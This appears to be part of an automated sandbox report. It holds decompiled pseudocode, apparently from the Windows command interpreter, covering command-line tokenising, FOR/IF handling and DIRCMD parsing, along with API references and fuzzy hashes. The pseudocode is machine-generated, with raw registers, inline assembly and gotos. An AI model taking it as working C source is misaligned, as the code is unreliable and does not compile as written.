                                                      					 *0x4a7706a4 = 0;
                                                      					return __eax;
                                                      				} else {
                                                      					__eax = E4A74FE1B(__ebx, __ecx, __edx, __edi, 0, 0x237b, 0x2328);
                                                      					if(__eax != 1) {
                                                      						EnterCriticalSection( *0x4a7541a4);
                                                      						 *0x4a7541b4 =  *0x4a7541b4 & 0x00000000;
                                                      						LeaveCriticalSection( *0x4a7541a4);
                                                      						return _t2;
                                                      					} else {
                                                      						__esi =  *0x4a7540b4; // 0x0
                                                      						while(__esi != 0) {
                                                      							__eax = E4A7357F4(__eax, __esi);
                                                      							__esi =  *((intOrPtr*)(__esi + 0x110));
                                                      						}
                                                      						goto L7;
                                                      					}
                                                      				}
                                                      			}





                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(4A73851C), ref: 4A731E72
                                                      • LeaveCriticalSection.KERNEL32(?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210,?,4A731C8D), ref: 4A731E85
                                                      • longjmp.MSVCRT(4A754B40,00000001,4A743723,4A76C642,4A731BBC,4A76C642,00002002,4A75C640,00000000,00000000,4A731E56,4A731F9D,-00000003,4A754210,4A754210), ref: 4A74FCB2
                                                      • longjmp.MSVCRT(4A754B40,00000001,?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210), ref: 4A74FD00
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: CriticalSectionlongjmp$EnterLeave
                                                      • String ID:
                                                      • API String ID: 4200650868-0
                                                      • Opcode ID: d2cdaa30cdeab61fb610db1dcea1b95337164cf922f792da1622fa67dda62575
                                                      • Instruction ID: 38ee911837b9dd41588b8b6fd979f4e3fe963cbe98bba0751414dd823533a7b1
                                                      • Opcode Fuzzy Hash: d2cdaa30cdeab61fb610db1dcea1b95337164cf922f792da1622fa67dda62575
                                                      • Instruction Fuzzy Hash: 67F036B29CE521ABEF719750C64FB89777AAB02B13F120400E604EECC1CB641D48D756
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E4A7322CA(signed short* _a4, intOrPtr _a8, signed int _a12) {
                                                      				signed int _v8;
                                                      				char _v208;
                                                      				signed int _v212;
                                                      				signed int _v216;
                                                      				intOrPtr _v220;
                                                      				signed int _v224;
                                                      				signed int _v228;
                                                      				signed int __ebx;
                                                      				signed int __edi;
                                                      				signed int __esi;
                                                      				void* __ebp;
                                                      				signed int _t76;
                                                      				intOrPtr _t79;
                                                      				signed short _t81;
                                                      				long _t82;
                                                      				signed int _t89;
                                                      				void* _t95;
                                                      				long _t96;
                                                      				void* _t100;
                                                      				intOrPtr _t111;
                                                      				signed int _t112;
                                                      				signed int _t113;
                                                      				intOrPtr _t122;
                                                      				intOrPtr _t123;
                                                      				signed int _t125;
                                                      				signed short* _t126;
                                                      				signed int _t131;
                                                      
                                                      				_t76 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t76 ^ _t131;
                                                      				_t126 = _a4;
                                                      				_v220 = _a8;
                                                      				if(_t126 == 0) {
                                                      					_t79 = E4A732041(4);
                                                      					goto L28;
                                                      				} else {
                                                      					__eax = __esi;
                                                      					_t15 = __eax + 2; // 0x2
                                                      					__edx = _t15;
                                                      					do {
                                                      						__cx =  *__eax;
                                                      						__eax = __eax + 1;
                                                      						__eax = __eax + 1;
                                                      					} while (__cx != 0);
                                                      					__eax = __eax - __edx;
                                                      					_push(__ebx);
                                                      					__eax = __eax >> 1;
                                                      					_push(__edi);
                                                      					__eax = 4 + __eax * 4;
                                                      					__eax = E4A732041(__eax);
                                                      					_v228 = __eax;
                                                      					_v212 = __eax;
                                                      					__edi = 0;
                                                      					_v216 = 0x4a754670;
                                                      					do {
                                                      						__eax = _v216;
                                                      						__ebx =  *_v216 & 0x0000ffff;
                                                      						if(__bx == 0) {
                                                      							break;
                                                      						}
                                                      						if(E4A7318EB(_v220, __ebx) == 0) {
                                                      							 *((short*)(__ebp + __edi * 2 - 0xcc)) = __bx;
                                                      							__edi = __edi + 1;
                                                      						}
                                                      						_v216 = _v216 + 2;
                                                      					} while (__edi < 0x63);
                                                      					__eax = 0;
                                                      					 *((short*)(__ebp + __edi * 2 - 0xcc)) = __ax;
                                                      					__eax = 1;
                                                      					_v224 = 1;
                                                      					_v216 = 1;
                                                      					while(1) {
                                                      						_t82 =  *_t126 & 0x0000ffff;
                                                      						if(_t82 == 0) {
                                                      							break;
                                                      						}
                                                      						if(_t82 == 0x22 || iswspace(_t82) == 0 && E4A7318EB( &_v208,  *_t126 & 0x0000ffff) == 0) {
                                                      							L17:
                                                      							_v224 = _v224 & 0x00000000;
                                                      							if(_v220 == 0 || E4A7318EB(_v220,  *_t126 & 0x0000ffff) == 0) {
                                                      								_v212 = _v212 + 2;
                                                      								 *_v212 =  *_t126;
                                                      								if( *_t126 == 0x22) {
                                                      									while(1) {
                                                      										_v212 = _v212 + 2;
                                                      										_t126 =  &(_t126[1]);
                                                      										 *_v212 =  *_t126;
                                                      										_t89 =  *_t126 & 0x0000ffff;
                                                      										if(_t89 == 0) {
                                                      											break;
                                                      										}
                                                      										if(_t89 == 0x22 || _t126[1] == 0) {
                                                      											if( *_t126 != 0) {
                                                      												goto L20;
                                                      											}
                                                      											break;
                                                      										} else {
                                                      											continue;
                                                      										}
                                                      									}
                                                      									_t126 = _t126;
                                                      								}
                                                      								L20:
                                                      								_v216 = _v216 & 0x00000000;
                                                      								L21:
                                                      								_t126 =  &(_t126[1]);
                                                      								continue;
                                                      							} else {
                                                      								goto L1;
                                                      							}
                                                      						} else {
                                                      							_t112 = _a12;
                                                      							if((_t112 & 0x00000001) != 0) {
                                                      								if(_v224 == 0) {
                                                      									goto L17;
                                                      								}
                                                      							}
                                                      							_t113 = _t112 & 0x00000002;
                                                      							if(_t113 == 0 || E4A7318EB(_v220,  *_t126 & 0x0000ffff) == 0) {
                                                      								_t125 = _a12 & 0x00000004;
                                                      								if(_t125 != 0) {
                                                      									_t95 = E4A7318EB(_v220,  *_t126 & 0x0000ffff);
                                                      									if(_t95 == 0) {
                                                      										goto L26;
                                                      									}
                                                      									goto L17;
                                                      								}
                                                      								L26:
                                                      								_t96 =  *_t126 & 0x0000ffff;
                                                      								if(_t96 != 0) {
                                                      									while(_t96 != 0x22 && (iswspace(_t96) != 0 || E4A7318EB( &_v208,  *_t126 & 0x0000ffff) != 0) && (_t113 == 0 || E4A7318EB(_v220,  *_t126 & 0x0000ffff) == 0)) {
                                                      										if(_t125 != 0) {
                                                      											_t100 = E4A7318EB(_v220,  *_t126 & 0x0000ffff);
                                                      											if(_t100 == 0) {
                                                      												goto L39;
                                                      											}
                                                      											break;
                                                      										}
                                                      										L39:
                                                      										_t126 =  &(_t126[1]);
                                                      										_t96 =  *_t126 & 0x0000ffff;
                                                      										if(_t96 != 0) {
                                                      											continue;
                                                      										}
                                                      										break;
                                                      									}
                                                      									if( *_t126 == 0) {
                                                      										break;
                                                      									}
                                                      									if(_v224 == 0 && _v216 == 0) {
                                                      										_v212 = _v212 + 2;
                                                      									}
                                                      									_v216 = 1;
                                                      									goto L17;
                                                      								}
                                                      								break;
                                                      							} else {
                                                      								goto L17;
                                                      							}
                                                      						}
                                                      					}
                                                      					_t79 = E4A73250F(_v228, (_v212 - _v228 >> 1) + (_v212 - _v228 >> 1) + 4);
                                                      					_pop(_t123);
                                                      					_pop(_t111);
                                                      					L28:
                                                      					return E4A7313A9(_t79, _t111, _v8 ^ _t131, _t122, _t123, _t126);
                                                      				}
                                                      				L1:
                                                      				if((_a12 & 0x00000002) != 0) {
                                                      					_t81 =  *_t126;
                                                      					if(_v216 == 0) {
                                                      						_v212 = _v212 + 2;
                                                      					}
                                                      					_v212 = _v212 + 2;
                                                      					 *_v212 = _t81;
                                                      					_v216 = 1;
                                                      					L4:
                                                      					_v212 = _v212 + 2;
                                                      					goto L21;
                                                      				}
                                                      				if((_a12 & 0x00000004) != 0) {
                                                      					 *_v212 =  *_t126;
                                                      				}
                                                      				_v216 = _v216 & 0x00000000;
                                                      				goto L4;
                                                      			}


                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: iswspace
                                                      • String ID: =,;
                                                      • API String ID: 2389812497-1539845467
                                                      • Opcode ID: 52916c6d38a484a3756d2839b9736e6d2e288d052f811bd32c8802bb09b1a5a5
                                                      • Instruction ID: 75d0227063a29f414b313cbedabad686485caa680a1d82cf15c1d38b31181db0
                                                      • Opcode Fuzzy Hash: 52916c6d38a484a3756d2839b9736e6d2e288d052f811bd32c8802bb09b1a5a5
                                                      • Instruction Fuzzy Hash: A281A57591A625DBDBB08F94CC047E9BBB8EF00355F1240DAD989AB042E7748EC8CF60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E4A735B4D(void* __ebx, intOrPtr __ecx, void* __edi, signed short* _a4) {
                                                      				WCHAR* _v8;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t24;
                                                      				WCHAR* _t25;
                                                      				void* _t26;
                                                      				signed short* _t27;
                                                      				signed int* _t31;
                                                      				signed int* _t33;
                                                      				intOrPtr _t34;
                                                      				intOrPtr _t35;
                                                      				signed int* _t37;
                                                      				signed int* _t40;
                                                      				intOrPtr* _t47;
                                                      				signed int* _t50;
                                                      				signed int* _t51;
                                                      				signed int* _t52;
                                                      				char* _t56;
                                                      				signed short* _t59;
                                                      				signed int _t60;
                                                      				signed int* _t62;
                                                      				signed int* _t63;
                                                      				signed int* _t64;
                                                      				signed int* _t65;
                                                      				signed int* _t66;
                                                      				signed int _t67;
                                                      				void* _t68;
                                                      				intOrPtr _t69;
                                                      				signed int* _t70;
                                                      				signed short* _t73;
                                                      				signed int* _t75;
                                                      				void* _t78;
                                                      
                                                      				_t68 = __edi;
                                                      				_t49 = __ecx;
                                                      				_push(__ecx);
                                                      				_t73 = _a4;
                                                      				if(_t73 == 0) {
                                                      					L18:
                                                      					_t24 = 1;
                                                      					L13:
                                                      					return _t24;
                                                      				}
                                                      				_t25 = E4A731896(0x208);
                                                      				_v8 = _t25;
                                                      				if(_t25 == 0) {
                                                      					goto L18;
                                                      				}
                                                      				_push(__ebx);
                                                      				_t26 = E4A7318EB(_t73, 0x5e);
                                                      				_t47 = 2;
                                                      				_t84 = _t26;
                                                      				if(_t26 != 0) {
                                                      					_t27 = _t73;
                                                      					_t59 =  &(_t27[1]);
                                                      					do {
                                                      						_t50 =  *_t27;
                                                      						_t27 = _t27 + _t47;
                                                      						__eflags = _t50;
                                                      					} while (_t50 != 0);
                                                      					_t31 = E4A731896(2 + (_t27 - _t59 >> 1) * 4);
                                                      					__eflags = _t31;
                                                      					if(_t31 == 0) {
                                                      						L29:
                                                      						_t24 = 1;
                                                      						goto L12;
                                                      					}
                                                      					_t51 = _t31;
                                                      					while(1) {
                                                      						__eflags =  *_t73;
                                                      						if( *_t73 == 0) {
                                                      							break;
                                                      						}
                                                      						_t60 =  *_t73 & 0x0000ffff;
                                                      						 *_t51 = _t60;
                                                      						_t51 = _t51 + _t47;
                                                      						_t73 = _t73 + _t47;
                                                      						__eflags = _t60 - 0x5e;
                                                      						if(_t60 == 0x5e) {
                                                      							_t67 = 0x5e;
                                                      							 *_t51 = _t67;
                                                      							_t51 = _t51 + _t47;
                                                      							__eflags = _t51;
                                                      						}
                                                      					}
                                                      					__eflags = 0;
                                                      					 *_t51 = 0;
                                                      					_t52 = _t31;
                                                      					_t13 =  &(_t52[0]); // 0x2
                                                      					_t75 = _t13;
                                                      					do {
                                                      						_t62 =  *_t52;
                                                      						_t52 = _t52 + _t47;
                                                      						__eflags = _t62;
                                                      					} while (_t62 != 0);
                                                      					_t49 = (_t52 - _t75 >> 1) + (_t52 - _t75 >> 1) + 2;
                                                      					_t33 = E4A732536(_t31, (_t52 - _t75 >> 1) + (_t52 - _t75 >> 1) + 2);
                                                      					_a4 = _t33;
                                                      					__eflags = _t33;
                                                      					if(__eflags != 0) {
                                                      						goto L4;
                                                      					}
                                                      					goto L29;
                                                      				} else {
                                                      					_a4 = _t73;
                                                      					L4:
                                                      					_t34 =  *0x4a754104; // 0x0
                                                      					_push(_t68);
                                                      					 *0x4a7541d4 = 1;
                                                      					_t35 = E4A731BD2(_t84, 1, _a4, _t34);
                                                      					 *0x4a7541d4 =  *0x4a7541d4 & 0x00000000;
                                                      					_t69 = _t35;
                                                      					if(_t69 == 1) {
                                                      						_t70 = E4A7319D6(_a4);
                                                      						__eflags = _t70;
                                                      						if(_t70 != 0) {
                                                      							__imp___wcsupr(_t70);
                                                      							_t56 = 0x4a744be0;
                                                      							_t37 = _t70;
                                                      							_t78 = 4;
                                                      							while(1) {
                                                      								_t63 =  *_t37;
                                                      								__eflags = _t63 -  *_t56;
                                                      								if(_t63 !=  *_t56) {
                                                      									break;
                                                      								}
                                                      								__eflags = _t63;
                                                      								if(_t63 == 0) {
                                                      									L37:
                                                      									_t37 = 0;
                                                      									L39:
                                                      									__eflags = _t37;
                                                      									if(_t37 == 0) {
                                                      										L48:
                                                      										E4A736D44(_t56, 0x234a, 1, _a4);
                                                      										L51:
                                                      										_t24 = 1;
                                                      										L11:
                                                      										L12:
                                                      										goto L13;
                                                      									}
                                                      									_t56 = L" FOR";
                                                      									_t40 = _t70;
                                                      									while(1) {
                                                      										_t64 =  *_t40;
                                                      										__eflags = _t64 -  *_t56;
                                                      										if(_t64 !=  *_t56) {
                                                      											break;
                                                      										}
                                                      										__eflags = _t64;
                                                      										if(_t64 == 0) {
                                                      											L45:
                                                      											_t40 = 0;
                                                      											L47:
                                                      											__eflags = _t40;
                                                      											if(_t40 != 0) {
                                                      												goto L51;
                                                      											}
                                                      											goto L48;
                                                      										}
                                                      										_t65 = _t40[0];
                                                      										__eflags = _t65 - _t56[2];
                                                      										if(_t65 != _t56[2]) {
                                                      											break;
                                                      										}
                                                      										_t40 = _t40 + _t78;
                                                      										_t56 =  &(_t56[_t78]);
                                                      										__eflags = _t65;
                                                      										if(_t65 != 0) {
                                                      											continue;
                                                      										}
                                                      										goto L45;
                                                      									}
                                                      									asm("sbb eax, eax");
                                                      									asm("sbb eax, 0xffffffff");
                                                      									goto L47;
                                                      								}
                                                      								_t66 = _t37[0];
                                                      								__eflags = _t66 - _t56[2];
                                                      								if(_t66 != _t56[2]) {
                                                      									break;
                                                      								}
                                                      								_t37 = _t37 + _t78;
                                                      								_t56 =  &(_t56[_t78]);
                                                      								__eflags = _t66;
                                                      								if(_t66 != 0) {
                                                      									continue;
                                                      								}
                                                      								goto L37;
                                                      							}
                                                      							asm("sbb eax, eax");
                                                      							asm("sbb eax, 0xffffffff");
                                                      							goto L39;
                                                      						}
                                                      						_t24 = 1;
                                                      						goto L11;
                                                      					}
                                                      					if(_t69 == 0xffffffff) {
                                                      						_t24 = 0;
                                                      						goto L11;
                                                      					}
                                                      					if( *0x4a754081 == 0 ||  *((short*)( *((intOrPtr*)(_t69 + 0x38)))) != 0x3a) {
                                                      						__eflags = E4A7318EB( *((intOrPtr*)(_t69 + 0x38)), 0x2a);
                                                      						if(__eflags != 0) {
                                                      							L17:
                                                      							_t24 = E4A73216E(_t47, _t69, 0x104, __eflags, _t69);
                                                      							goto L11;
                                                      						}
                                                      						__eflags = E4A7318EB( *((intOrPtr*)(_t69 + 0x38)), 0x3f);
                                                      						if(__eflags != 0) {
                                                      							goto L17;
                                                      						}
                                                      						__eflags = E4A733370(_t47, _t69, _v8, 0x104) - _t47;
                                                      						if(__eflags == 0) {
                                                      							goto L9;
                                                      						}
                                                      						goto L17;
                                                      					} else {
                                                      						if( *0x4a7540b4 == 0) {
                                                      							_push(0);
                                                      							_push(0x400023aa);
                                                      							E4A736D44(_t49);
                                                      							goto L51;
                                                      						}
                                                      						L9:
                                                      						_t24 = E4A73566F(_t49, 0x104, _t69, _v8, 0x104, 1);
                                                      						if(_t24 == 0) {
                                                      							_t24 =  *0x4a754188; // 0x0
                                                      						}
                                                      						goto L11;
                                                      					}
                                                      				}
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$AllocProcess_setjmp3wcschr
                                                      • String ID: FOR$ IF
                                                      • API String ID: 717958327-2924197646
                                                      • Opcode ID: 4c80ee90585d168911f049589349792c8c6d19959362e901ef35177a81370419
                                                      • Instruction ID: 21c8c614145718aaab8fbc465f004560b97a787d7e9bf23a01f41ef516d63d03
                                                      • Opcode Fuzzy Hash: 4c80ee90585d168911f049589349792c8c6d19959362e901ef35177a81370419
                                                      • Instruction Fuzzy Hash: 50515B62799613ABEBB15F24CC45BAA3E66DF5976CF020124E401CF191F761C589D390
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E4A751877(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t57;
                                                      				intOrPtr _t58;
                                                      				signed int _t66;
                                                      				signed int _t68;
                                                      				intOrPtr _t70;
                                                      				intOrPtr* _t71;
                                                      				signed int _t74;
                                                      				intOrPtr _t75;
                                                      				signed int _t80;
                                                      				short* _t82;
                                                      				long _t84;
                                                      				signed int _t86;
                                                      				wchar_t* _t87;
                                                      				signed int _t91;
                                                      				signed int _t95;
                                                      				short _t96;
                                                      				signed int _t99;
                                                      				signed int _t100;
                                                      				void* _t101;
                                                      				signed int _t104;
                                                      				int _t105;
                                                      				intOrPtr _t106;
                                                      				signed int _t109;
                                                      				signed int _t110;
                                                      				void* _t111;
                                                      
                                                      				_t91 = __ebx;
                                                      				_push(0x20);
                                                      				_push(0x4a751a88);
                                                      				E4A73264A(__ebx, __edi, __esi);
                                                      				_t57 = E4A731896(0x4000);
                                                      				 *(_t111 - 0x20) = _t57;
                                                      				_t99 = 0;
                                                      				if(_t57 != 0) {
                                                      					 *((intOrPtr*)(_t111 - 4)) = 0;
                                                      					__eflags =  *(_t111 + 0x1c);
                                                      					if( *(_t111 + 0x1c) != 0) {
                                                      						L4:
                                                      						 *(_t111 - 0x24) = _t99;
                                                      						_t109 = 0;
                                                      						 *(_t111 - 0x28) = 0;
                                                      						_t92 = _t91 | 0xffffffff;
                                                      						 *(_t111 - 0x2c) = _t92;
                                                      						 *(_t111 - 0x1c) = _t99;
                                                      						_t104 = 0;
                                                      						__eflags = 0;
                                                      						while(1) {
                                                      							 *(_t111 - 0x30) = _t104;
                                                      							_t58 =  *((intOrPtr*)(_t111 + 0x10));
                                                      							__eflags = _t104 - _t58;
                                                      							if(_t104 >= _t58) {
                                                      								break;
                                                      							}
                                                      							_t84 =  *( *((intOrPtr*)(_t111 + 8)) + _t104 * 2) & 0x0000ffff;
                                                      							__eflags = _t84 - 0x2f;
                                                      							if(_t84 != 0x2f) {
                                                      								__eflags = _t84 - 0x22;
                                                      								if(_t84 != 0x22) {
                                                      									__eflags =  *(_t111 - 0x24) - _t99;
                                                      									if( *(_t111 - 0x24) != _t99) {
                                                      										L16:
                                                      										_t86 =  *( *((intOrPtr*)(_t111 + 8)) + _t104 * 2) & 0x0000ffff;
                                                      										__eflags = _t86 - 0x3a;
                                                      										if(_t86 == 0x3a) {
                                                      											L21:
                                                      											_t31 = _t104 + 1; // 0x1
                                                      											_t92 = _t31;
                                                      											 *(_t111 - 0x2c) = _t92;
                                                      											goto L22;
                                                      										}
                                                      										__eflags = _t86 - 0x5c;
                                                      										if(_t86 == 0x5c) {
                                                      											goto L21;
                                                      										}
                                                      										__eflags = _t86 - 0x2a;
                                                      										if(_t86 == 0x2a) {
                                                      											L20:
                                                      											 *(_t111 - 0x1c) = 1;
                                                      											goto L23;
                                                      										}
                                                      										__eflags = _t86 - 0x3f;
                                                      										if(_t86 != 0x3f) {
                                                      											goto L23;
                                                      										}
                                                      										goto L20;
                                                      									}
                                                      									_t87 = wcschr(L" &()[]{}^=;!%\'+,`~", _t84);
                                                      									__eflags = _t87;
                                                      									if(_t87 == 0) {
                                                      										_t99 = 0;
                                                      										__eflags = 0;
                                                      										goto L16;
                                                      									}
                                                      									_t23 = _t104 + 1; // 0x1
                                                      									_t109 = _t23;
                                                      									 *(_t111 - 0x28) = _t109;
                                                      									 *(_t111 - 0x1c) =  *(_t111 - 0x1c) & 0x00000000;
                                                      									_t99 = 0;
                                                      									goto L23;
                                                      								}
                                                      								__eflags =  *(_t111 - 0x24) - _t99;
                                                      								if( *(_t111 - 0x24) == _t99) {
                                                      									_t109 = _t104;
                                                      									 *(_t111 - 0x28) = _t109;
                                                      								}
                                                      								__eflags =  *(_t111 - 0x24) - _t99;
                                                      								 *(_t111 - 0x24) = 0 |  *(_t111 - 0x24) == _t99;
                                                      								goto L23;
                                                      							} else {
                                                      								_t14 = _t104 + 1; // 0x1
                                                      								_t109 = _t14;
                                                      								 *(_t111 - 0x28) = _t109;
                                                      								L22:
                                                      								 *(_t111 - 0x1c) = _t99;
                                                      								L23:
                                                      								_t104 = _t104 + 1;
                                                      								continue;
                                                      							}
                                                      						}
                                                      						__eflags = _t92 - 0xffffffff;
                                                      						if(_t92 == 0xffffffff) {
                                                      							L26:
                                                      							_t92 = _t109;
                                                      							 *(_t111 - 0x2c) = _t109;
                                                      							L27:
                                                      							_t105 = _t58 - _t109 + _t58 - _t109;
                                                      							memcpy( *(_t111 - 0x20),  *((intOrPtr*)(_t111 + 8)) + _t109 * 2, _t105);
                                                      							__eflags =  *(_t111 - 0x1c);
                                                      							if( *(_t111 - 0x1c) != 0) {
                                                      								__eflags = 0;
                                                      								_t94 =  *(_t111 - 0x20);
                                                      								 *((short*)( *(_t111 - 0x20) + _t105)) = 0;
                                                      							} else {
                                                      								_t82 =  *(_t111 - 0x20) + _t105;
                                                      								_t96 = 0x2a;
                                                      								 *_t82 = _t96;
                                                      								_t94 = 0;
                                                      								 *((short*)(_t82 + 2)) = 0;
                                                      							}
                                                      							_t106 =  *((intOrPtr*)(_t111 + 0x18));
                                                      							_t66 = E4A7514FD(_t94, _t99,  *(_t111 - 0x20), 0x2000, _t106, _t92 - _t109);
                                                      							 *0x4a754150 = _t66;
                                                      							 *0x4a75414c = _t66;
                                                      							_t95 = _t109;
                                                      							 *0x4a754144 = _t95;
                                                      							 *0x4a754148 = _t106;
                                                      							_t99 = 0;
                                                      							L32:
                                                      							__eflags = _t66 - _t99;
                                                      							if(_t66 == _t99) {
                                                      								L43:
                                                      								 *((intOrPtr*)(_t111 - 4)) = 0xfffffffe;
                                                      								E4A751A79();
                                                      								_t68 =  *0x4a754150; // 0x0
                                                      								goto L44;
                                                      							}
                                                      							__eflags =  *((intOrPtr*)(_t111 + 0x14)) - _t99;
                                                      							if( *((intOrPtr*)(_t111 + 0x14)) == _t99) {
                                                      								 *0x4a75414c =  *0x4a75414c - 1;
                                                      								__eflags =  *0x4a75414c;
                                                      								if( *0x4a75414c < 0) {
                                                      									_t80 = _t66 - 1;
                                                      									__eflags = _t80;
                                                      									 *0x4a75414c = _t80;
                                                      								}
                                                      							} else {
                                                      								 *0x4a75414c =  *0x4a75414c + 1;
                                                      								__eflags =  *0x4a75414c - _t66; // 0x0
                                                      								if(__eflags >= 0) {
                                                      									 *0x4a75414c = _t99;
                                                      								}
                                                      							}
                                                      							_t70 =  *0x4a7706c0; // 0x0
                                                      							_t100 =  *0x4a75414c; // 0x0
                                                      							_t107 =  *((intOrPtr*)(_t70 + _t100 * 4));
                                                      							_t71 =  *((intOrPtr*)(_t70 + _t100 * 4));
                                                      							_t49 = _t71 + 2; // 0x2
                                                      							_t101 = _t49;
                                                      							do {
                                                      								_t110 =  *_t71;
                                                      								_t71 = _t71 + 2;
                                                      								__eflags = _t110;
                                                      							} while (_t110 != 0);
                                                      							_t74 = _t71 - _t101 >> 1;
                                                      							_t75 =  *((intOrPtr*)(_t111 + 0xc));
                                                      							__eflags = _t74 + _t95 - _t75;
                                                      							if(_t74 + _t95 < _t75) {
                                                      								__eflags = _t75 - _t95;
                                                      								E4A73185A( *((intOrPtr*)(_t111 + 8)) + _t95 * 2, _t75 - _t95, _t107);
                                                      							} else {
                                                      								 *0x4a754150 =  *0x4a754150 & 0x00000000;
                                                      							}
                                                      							goto L43;
                                                      						}
                                                      						__eflags = _t92 - _t109;
                                                      						if(_t92 >= _t109) {
                                                      							goto L27;
                                                      						}
                                                      						goto L26;
                                                      					}
                                                      					__eflags =  *0x4a754148 -  *((intOrPtr*)(_t111 + 0x18)); // 0x0
                                                      					if(__eflags == 0) {
                                                      						_t66 =  *0x4a754150; // 0x0
                                                      						_t95 =  *0x4a754144; // 0x0
                                                      						goto L32;
                                                      					}
                                                      					goto L4;
                                                      				} else {
                                                      					_t68 = 0;
                                                      					L44:
                                                      					return E4A7313B6(_t68);
                                                      				}
                                                      			}





























                                                      APIs
                                                        • Part of subcall function 4A731896: GetProcessHeap.KERNEL32(00000008,4A7325C0,4A7325BB,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?), ref: 4A7318A9
                                                        • Part of subcall function 4A731896: HeapAlloc.KERNEL32(00000000,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?,?,4A736CE6), ref: 4A7318B0
                                                      • memcpy.MSVCRT ref: 4A751984
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$AllocProcessmemcpy
                                                      • String ID: &()[]{}^=;!%'+,`~
                                                      • API String ID: 4164033339-381716982
                                                      • Opcode ID: 3e0d7e4d6c919c36dbf9c8e5014d21d5c921f58785b345e2de45e6d827f3971f
                                                      • Instruction ID: 8092ab4478c543c3be2a959466b1ec9a16c7e6cccad159683f891ac41d8d3941
                                                      • Opcode Fuzzy Hash: 3e0d7e4d6c919c36dbf9c8e5014d21d5c921f58785b345e2de45e6d827f3971f
                                                      • Instruction Fuzzy Hash: 87513370E4A206CFCB70EFA8C4405D9BBB6FB453A6F02802AD400E7A58E7309D49CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E4A73AEEB(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				char _v532;
                                                      				short _v1056;
                                                      				intOrPtr _v1060;
                                                      				void* _v1072;
                                                      				char _v1076;
                                                      				char _v1080;
                                                      				char _v1084;
                                                      				char _v1088;
                                                      				char _v1092;
                                                      				char _v1096;
                                                      				char _v1100;
                                                      				void* _v1108;
                                                      				void* _v1112;
                                                      				short _v1114;
                                                      				short _v1116;
                                                      				void* _v1120;
                                                      				short _v1122;
                                                      				short _v1124;
                                                      				void* _v1128;
                                                      				short _v1130;
                                                      				short _v1132;
                                                      				void* _v1136;
                                                      				short _v1138;
                                                      				short _v1140;
                                                      				void* _v1144;
                                                      				short _v1146;
                                                      				short _v1148;
                                                      				void* _v1152;
                                                      				short _v1154;
                                                      				short _v1156;
                                                      				char _v1160;
                                                      				char _v1164;
                                                      				intOrPtr _v1168;
                                                      				signed int _v1172;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t61;
                                                      				intOrPtr _t65;
                                                      				long _t67;
                                                      				void* _t72;
                                                      				void* _t86;
                                                      				intOrPtr _t90;
                                                      				intOrPtr _t100;
                                                      				intOrPtr _t102;
                                                      				signed int _t103;
                                                      
                                                      				_t90 = __edx;
                                                      				_t86 = __ecx;
                                                      				_t61 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t61 ^ _t103;
                                                      				_v1156 = 0;
                                                      				_v1154 = 0;
                                                      				_v1160 = 0;
                                                      				asm("stosd");
                                                      				_v1148 = 0;
                                                      				_v1146 = 0;
                                                      				asm("stosd");
                                                      				_v1140 = 0;
                                                      				_v1138 = 0;
                                                      				asm("stosd");
                                                      				_v1132 = 0;
                                                      				_v1130 = 0;
                                                      				asm("stosd");
                                                      				_v1124 = 0;
                                                      				_v1122 = 0;
                                                      				_t100 = _a4;
                                                      				asm("stosd");
                                                      				_v1116 = 0;
                                                      				_v1114 = 0;
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				_v1096 = 0;
                                                      				_v1092 = 0;
                                                      				_v1088 = 0;
                                                      				_v1084 = 0;
                                                      				_v1076 = 0;
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				_t65 =  *0x4a754104; // 0x0
                                                      				_v1060 = _t65;
                                                      				_v1168 = 6;
                                                      				_v1164 = 0;
                                                      				_v1172 = 0x8000;
                                                      				_v1100 = 0;
                                                      				_v1080 = 0;
                                                      				_t67 = GetEnvironmentVariableW(L"DIRCMD",  &_v1056, 0x106);
                                                      				_t104 = _t67;
                                                      				if(_t67 != 0) {
                                                      					__eflags = E4A73B210(_t90, __eflags,  &_v1056,  &_v1172) - 1;
                                                      					if(__eflags == 0) {
                                                      						_push(0);
